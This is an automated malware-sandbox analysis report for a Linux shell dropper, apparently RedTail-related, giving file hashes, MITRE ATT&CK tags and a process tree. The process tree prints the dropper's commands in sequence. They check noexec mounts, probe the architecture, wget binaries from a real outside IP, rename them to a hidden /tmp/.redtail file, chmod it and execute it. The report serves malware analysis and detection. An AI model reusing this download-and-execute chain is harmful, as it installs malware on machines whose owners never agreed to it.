3501a9f19a8d7e324f23b303a25ff0fb4ea93709f0b620820939fd863d7a9fd6

Analysis

max time kernel
64s
max time network
68s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
25-11-2024 16:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sh.sh
Size

1KB
MD5

76d58f7849b2fde18b37f09ced7607de
SHA1

f5f9858f1b5906c33462ec4b85f5cbcac849ad11
SHA256

3501a9f19a8d7e324f23b303a25ff0fb4ea93709f0b620820939fd863d7a9fd6
SHA512

9f1f1047c901b0197e81e76e4eb34931ab2b457990a3d351ab4423bcbbb5c2da4c84bb138947533b41d11711f12c950698ea191892d3f0dde1b4a0fb1988e9af

Score

7^/10

defense_evasion discovery upx

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmod

pid process

787 chmod
804 chmod
809 chmod
814 chmod
Executes dropped EXE 4 IoCs

Processes:

.redtail.redtail.redtail.redtail

ioc pid process

/tmp/.redtail 788 .redtail
/tmp/.redtail 805 .redtail
/tmp/.redtail 810 .redtail
/tmp/.redtail 815 .redtail

pid	process
787	chmod
804	chmod
809	chmod
814	chmod

ioc	pid	process
/tmp/.redtail	788	.redtail
/tmp/.redtail	805	.redtail
/tmp/.redtail	810	.redtail
/tmp/.redtail	815	.redtail

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
/tmp/x86_64	upx
/tmp/i686	upx
/tmp/aarch64	upx
/tmp/arm7	upx

Reads runtime system information 3 IoCs
Reads data from /proc virtual filesystem.
discovery

Processes:

catawkfind

description ioc process

File opened for reading /proc/mounts cat
File opened for reading /proc/self/maps awk
File opened for reading /proc/filesystems find

description	ioc	process
File opened for reading	/proc/mounts	cat
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/filesystems	find

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

Processes:

sh.shwgetwgetwgetwget

description	ioc	process
File opened for modification	/tmp/.redtail	sh.sh
File opened for modification	/tmp/i686	wget
File opened for modification	/tmp/aarch64	wget
File opened for modification	/tmp/arm7	wget
File opened for modification	/tmp/x86_64	wget

/tmp/sh.sh
/tmp/sh.sh
1⤵
- Writes file to tmp directory
PID:696
- /bin/cat
  cat /proc/mounts
  2⤵
  - Reads runtime system information
  PID:704
- /bin/grep
  grep noexec
  2⤵
  PID:705
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  - Reads runtime system information
  PID:706
- /usr/bin/whoami
  whoami
  2⤵
  PID:712
- /usr/bin/find
  find / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*"
  2⤵
  - Reads runtime system information
  PID:714
- /bin/uname
  uname -mp
  2⤵
  PID:762
- /bin/grep
  grep -q x86_64
  2⤵
  PID:765
- /bin/grep
  grep -q amd64
  2⤵
  PID:767
- /bin/grep
  grep -q "i[3456]86"
  2⤵
  PID:770
- /bin/grep
  grep -q armv8
  2⤵
  PID:773
- /bin/grep
  grep -q aarch64
  2⤵
  PID:775
- /bin/grep
  grep -q armv7
  2⤵
  PID:777
- /usr/bin/wget
  wget http://45.202.35.190/x86_64
  2⤵
  - Writes file to tmp directory
  PID:779
- /bin/cat
  cat x86_64
  2⤵
  PID:785
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:787
- /tmp/.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:788
- /usr/bin/wget
  wget http://45.202.35.190/i686
  2⤵
  - Writes file to tmp directory
  PID:792
- /bin/cat
  cat i686
  2⤵
  PID:803
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:804
- /tmp/.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:805
- /usr/bin/wget
  wget http://45.202.35.190/aarch64
  2⤵
  - Writes file to tmp directory
  PID:807
- /bin/cat
  cat aarch64
  2⤵
  PID:808
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:809
- /tmp/.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:810
- /usr/bin/wget
  wget http://45.202.35.190/arm7
  2⤵
  - Writes file to tmp directory
  PID:812
- /bin/cat
  cat arm7
  2⤵
  PID:813
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:814
- /tmp/.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:815

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/aarch64

Filesize
1.3MB

MD5
322095f828345179dc422bcf65db4b61

SHA1
c244dce124772e0d94a01b3bc0d5d005614101b2

SHA256
992cb5a753697ee2642aa390f09326fcdb7fd59119053d6b1bdd35d47e62f472

SHA512
c8da61b2ee95cae3eb62d4985be6eeee41976fa0a69e0c738353e7e179454e8872d52152ca6df54949a6c6dd42f48b0981593c1f4f973e9e1e176ba4ca978f70

Download Submit
/tmp/arm7

Filesize
1.1MB

MD5
045daa66263bfd467051c013e9222faf

SHA1
4b943b14526d7bf7be2b3e3f9af24d1f35015548

SHA256
d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4

SHA512
bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f

Download Submit
/tmp/i686

Filesize
1.5MB

MD5
01fc359f540fca7f496b5c4841c67f7e

SHA1
4689b4afff6f08b8c9e781d07c3a782823a6689f

SHA256
69dc9dd8065692ea262850b617c621e6c1361e9095a90b653b26e3901597f586

SHA512
4d7170159ec6a651cd7b8e64ab06aa76f3bb691be70d219a7dbc1116a383f43226ec6815ae51fe23b25c9450f142cba0ba71ce659dae9ca376e97f126e81a4fc

Download Submit
/tmp/x86_64

Filesize
1.6MB

MD5
f6634e2fb7872be767a2cb5b1da04103

SHA1
532037729f2da9fc1341f744e5afa2420bcfebca

SHA256
29f8524562c2436f42019e0fc473bd88584234c57979c7375c1ace3648784e4b

SHA512
e1b34b5235ecfe8f74698d10ecf70758adcb5ef2832b3be272fe737770f47daf4974fe6c957ccf24282a1a0af4a4cca393727517ea5ade97504a55b3b6a6ff51

Download Submit